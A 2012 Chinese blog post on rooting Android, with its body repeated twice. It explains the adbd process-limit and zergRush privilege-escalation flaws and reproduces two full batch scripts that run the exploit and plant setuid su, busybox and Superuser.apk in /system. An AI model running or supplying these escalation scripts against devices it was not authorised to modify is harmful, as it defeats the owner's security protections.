Android root 有感
2012-11-25 21:31
357 查看
1 Android下面想做事情,会有权限限制。所以经常需要提取Root权限。
2 Android下面获取Root权限的方法并不完全是一样的。这是由于Android的源码漏洞决定了的。提取Root权限就是利用Android系统的漏洞。所以不同的版本的漏洞是不一样的,才导致提取Root的方法是不一样的。
3 Android获取Root的最终步骤是:在System目录下的bin或xbin目录下,放一个有root权限的su文件。在xbin下面放入一个busybox文件;另外装上一个SuperUser.apk,用来管理权限的使用。
4 Android版本的漏洞有下面几个:
1 adbd中有个漏洞是创建线程成功时,降底进程的权限。但是创建进程时没有判断进程有没有创建成功。利用Shell进程最大数的限制,不断的Fork()新的僵尸进程。从而达到进程限制上限。这样就可以让adbd创建不成功,从而跳过降权限的语句。
2 zergRush exploit :zergRush堆栈溢出.需要一个.zergRush的可执行文件.
3
4 Android4.0 提取ROOT.
重新链接.
5 提取Root的指令如下:
zerRush漏洞:
@echo ---------------------------------------------------------------
@echo Easy rooting toolkit (v1.0)
@echo created by DooMLoRD
@echo using exploit zergRush (Revolutionary Team)
@echo Credits go to all those involved in making this possible!
@echo ---------------------------------------------------------------
@echo [*] This script will:
@echo (1) root ur device using zergRush exploit
@echo (2) install Busybox (1.18.4)
@echo (3) install SU files (3.0.5)
@echo [*] Before u begin:
@echo (1) make sure u have installed adb drivers for ur device
@echo (2) enable "USB DEBUGGING"
@echo from (Menu\Settings\Applications\Development)
@echo (3) enable "UNKNOWN SOURCES"
@echo from (Menu\Settings\Applications)
@echo (4) [OPTIONAL] increase screen timeout to 10 minutes
@echo (5) connect USB cable to PHONE and then connect to PC
@echo (6) skip "PC Companion Software" prompt on device
@echo ---------------------------------------------------------------
@echo CONFIRM ALL THE ABOVE THEN
@pause
@echo --- STARTING ----
@echo --- WAITING FOR DEVICE
@files\adb wait-for-device
@echo --- cleaning
@files\adb shell "cd /data/local/tmp/; rm *"
@echo --- pushing zergRush"
@files\adb push files\zergRush /data/local/tmp/.
@echo --- correcting permissions
@files\adb shell "chmod 777 /data/local/tmp/zergRush"
@echo --- executing zergRush
@files\adb shell "./data/local/tmp/zergRush"
@echo --- WAITING FOR DEVICE TO RECONNECT
@echo if it gets stuck over here for a long time then try:
@echo disconnect usb cable and reconnect it
@echo toggle "USB DEBUGGING" (first disable it then enable it)
@echo --- DEVICE FOUND
@files\adb wait-for-device
@echo --- pushing busybox
@files\adb push files\busybox /data/local/tmp/.
@echo --- correcting permissions
@files\adb shell "chmod 755 /data/local/tmp/busybox"
@echo --- remounting /system
@files\adb shell "/data/local/tmp/busybox mount -o remount,rw /system"
@echo --- copying busybox to /system/xbin/
@files\adb shell "dd if=/data/local/tmp/busybox of=/system/xbin/busybox"
@echo --- correcting ownership
@files\adb shell "chown root.shell /system/xbin/busybox"
@echo --- correcting permissions
@files\adb shell "chmod 04755 /system/xbin/busybox"
@echo --- installing busybox
@files\adb shell "/system/xbin/busybox --install -s /system/xbin"
@files\adb shell "rm -r /data/local/tmp/busybox"
@echo --- pushing SU binary
@files\adb push files\su /system/bin/su
@echo --- correcting ownership
@files\adb shell "chown root.shell /system/bin/su"
@echo --- correcting permissions
@files\adb shell "chmod 06755 /system/bin/su"
@echo --- correcting symlinks
@files\adb shell "rm /system/xbin/su"
@files\adb shell "ln -s /system/bin/su /system/xbin/su"
@echo --- pushing Superuser app
@files\adb push files\Superuser.apk /system/app/.
@echo --- cleaning
@files\adb shell "cd /data/local/tmp/; rm *"
@echo --- rebooting
@files\adb reboot
@echo ALL DONE!!!
@pause
Android4.0下:
echo off
cls
echo.
echo by zopo008 (欢迎访问bbs.zopomobile.com.)
echo.
echo.
adb shell mv /data/local/tmp /data/local/tmp.bak
adb shell ln -s /data /data/local/tmp
adb reboot
echo Rebooting (1/3) - Continue once device finishes rebooting
echo 正在重启手机(第1次,共3次)- 请等待重启完毕,之后按任意键继续
pause
adb shell rm /data/local.prop > nul
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
adb reboot
echo Rebooting (2/3) - Continue once device finishes rebooting
echo 正在重启平板(第2次,共3次)- 请等待重启完毕,之后按任意键继续
pause
adb shell id
echo If the id is 0 / root then continue, otherwise ctrl+c to cancel and start over
echo 如果上面显示的id为0或者root,按任意键继续;否则按Ctrl-C并回复Y来取消本次root尝试,然后重试
pause
adb remount
adb push su /system/bin/su
adb shell chown 0.0 /system/bin/su
adb shell chmod 06755 /system/bin/su
adb push busybox /system/bin/busybox
adb shell chown 0.0 /system/bin/busybox
adb shell chmod 0755 /system/bin/busybox
adb push Superuser.apk /system/app/Superuser.apk
adb shell chown 0.0 /system/app/Superuser.apk
adb shell chmod 0644 /system/app/Superuser.apk
adb push RootExplorer.apk /system/app/RootExplorer.apk
adb shell chown 0.0 /system/app/RootExplorer.apk
adb shell chmod 0644 /system/app/RootExplorer.apk
echo Removing changes except ROOT
echo 正在进行清理和恢复
adb shell rm /data/local.prop
adb shell rm /data/local/tmp
adb shell mv /data/local/tmp.bak /data/local/tmp
adb reboot
echo Rebooting (3/3) - You should now be Rooted
echo 正在重启平板(第3次,共3次) - root成功
pause
echo on
2 Android下面获取Root权限的方法并不完全是一样的。这是由于Android的源码漏洞决定了的。提取Root权限就是利用Android系统的漏洞。所以不同的版本的漏洞是不一样的,才导致提取Root的方法是不一样的。
3 Android获取Root的最终步骤是:在System目录下的bin或xbin目录下,放一个有root权限的su文件。在xbin下面放入一个busybox文件;另外装上一个SuperUser.apk,用来管理权限的使用。
4 Android版本的漏洞有下面几个:
1 adbd中有个漏洞是创建线程成功时,降底进程的权限。但是创建进程时没有判断进程有没有创建成功。利用Shell进程最大数的限制,不断的Fork()新的僵尸进程。从而达到进程限制上限。这样就可以让adbd创建不成功,从而跳过降权限的语句。
2 zergRush exploit :zergRush堆栈溢出.需要一个.zergRush的可执行文件.
3
4 Android4.0 提取ROOT.
重新链接.
5 提取Root的指令如下:
zerRush漏洞:
@echo ---------------------------------------------------------------
@echo Easy rooting toolkit (v1.0)
@echo created by DooMLoRD
@echo using exploit zergRush (Revolutionary Team)
@echo Credits go to all those involved in making this possible!
@echo ---------------------------------------------------------------
@echo [*] This script will:
@echo (1) root ur device using zergRush exploit
@echo (2) install Busybox (1.18.4)
@echo (3) install SU files (3.0.5)
@echo [*] Before u begin:
@echo (1) make sure u have installed adb drivers for ur device
@echo (2) enable "USB DEBUGGING"
@echo from (Menu\Settings\Applications\Development)
@echo (3) enable "UNKNOWN SOURCES"
@echo from (Menu\Settings\Applications)
@echo (4) [OPTIONAL] increase screen timeout to 10 minutes
@echo (5) connect USB cable to PHONE and then connect to PC
@echo (6) skip "PC Companion Software" prompt on device
@echo ---------------------------------------------------------------
@echo CONFIRM ALL THE ABOVE THEN
@pause
@echo --- STARTING ----
@echo --- WAITING FOR DEVICE
@files\adb wait-for-device
@echo --- cleaning
@files\adb shell "cd /data/local/tmp/; rm *"
@echo --- pushing zergRush"
@files\adb push files\zergRush /data/local/tmp/.
@echo --- correcting permissions
@files\adb shell "chmod 777 /data/local/tmp/zergRush"
@echo --- executing zergRush
@files\adb shell "./data/local/tmp/zergRush"
@echo --- WAITING FOR DEVICE TO RECONNECT
@echo if it gets stuck over here for a long time then try:
@echo disconnect usb cable and reconnect it
@echo toggle "USB DEBUGGING" (first disable it then enable it)
@echo --- DEVICE FOUND
@files\adb wait-for-device
@echo --- pushing busybox
@files\adb push files\busybox /data/local/tmp/.
@echo --- correcting permissions
@files\adb shell "chmod 755 /data/local/tmp/busybox"
@echo --- remounting /system
@files\adb shell "/data/local/tmp/busybox mount -o remount,rw /system"
@echo --- copying busybox to /system/xbin/
@files\adb shell "dd if=/data/local/tmp/busybox of=/system/xbin/busybox"
@echo --- correcting ownership
@files\adb shell "chown root.shell /system/xbin/busybox"
@echo --- correcting permissions
@files\adb shell "chmod 04755 /system/xbin/busybox"
@echo --- installing busybox
@files\adb shell "/system/xbin/busybox --install -s /system/xbin"
@files\adb shell "rm -r /data/local/tmp/busybox"
@echo --- pushing SU binary
@files\adb push files\su /system/bin/su
@echo --- correcting ownership
@files\adb shell "chown root.shell /system/bin/su"
@echo --- correcting permissions
@files\adb shell "chmod 06755 /system/bin/su"
@echo --- correcting symlinks
@files\adb shell "rm /system/xbin/su"
@files\adb shell "ln -s /system/bin/su /system/xbin/su"
@echo --- pushing Superuser app
@files\adb push files\Superuser.apk /system/app/.
@echo --- cleaning
@files\adb shell "cd /data/local/tmp/; rm *"
@echo --- rebooting
@files\adb reboot
@echo ALL DONE!!!
@pause
Android4.0下:
echo off
cls
echo.
echo by zopo008 (欢迎访问bbs.zopomobile.com.)
echo.
echo.
adb shell mv /data/local/tmp /data/local/tmp.bak
adb shell ln -s /data /data/local/tmp
adb reboot
echo Rebooting (1/3) - Continue once device finishes rebooting
echo 正在重启手机(第1次,共3次)- 请等待重启完毕,之后按任意键继续
pause
adb shell rm /data/local.prop > nul
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
adb reboot
echo Rebooting (2/3) - Continue once device finishes rebooting
echo 正在重启平板(第2次,共3次)- 请等待重启完毕,之后按任意键继续
pause
adb shell id
echo If the id is 0 / root then continue, otherwise ctrl+c to cancel and start over
echo 如果上面显示的id为0或者root,按任意键继续;否则按Ctrl-C并回复Y来取消本次root尝试,然后重试
pause
adb remount
adb push su /system/bin/su
adb shell chown 0.0 /system/bin/su
adb shell chmod 06755 /system/bin/su
adb push busybox /system/bin/busybox
adb shell chown 0.0 /system/bin/busybox
adb shell chmod 0755 /system/bin/busybox
adb push Superuser.apk /system/app/Superuser.apk
adb shell chown 0.0 /system/app/Superuser.apk
adb shell chmod 0644 /system/app/Superuser.apk
adb push RootExplorer.apk /system/app/RootExplorer.apk
adb shell chown 0.0 /system/app/RootExplorer.apk
adb shell chmod 0644 /system/app/RootExplorer.apk
echo Removing changes except ROOT
echo 正在进行清理和恢复
adb shell rm /data/local.prop
adb shell rm /data/local/tmp
adb shell mv /data/local/tmp.bak /data/local/tmp
adb reboot
echo Rebooting (3/3) - You should now be Rooted
echo 正在重启平板(第3次,共3次) - root成功
pause
echo on
相关文章推荐
- Android root 有感
- android 非root下wifi测试连接
- c8650 android2.3.3 root过程
- android手机root后的安全问题 (三)
- android手机root后的安全问题 (三)
- android手机root后的安全问题 (三)
- shell@android: 怎么切到root
- Compile Android 5.1.1 ROM with ROOT by SuperSU
- android 4.2 root
- 非root Android 设备用gdbserver进行native 调试的方法
- Android之Handler有感(一)
- 【转】【Android测试技巧】01. root后adb shell默认不是root用户时,如何将文件放入手机系统中
- 无root手机版抓android包工具,超好用
- Android root 原理
- android.view.ViewRoot$CalledFromWrongThreadException
- Android 5.0后截屏,无需root
- Android 外部SD卡/U盘无法写入解决方法(需要root)
- Android-i9023 Root
- 一篇关于Android Root不错的文章
- ROOT android 原理。 基于(zergRush)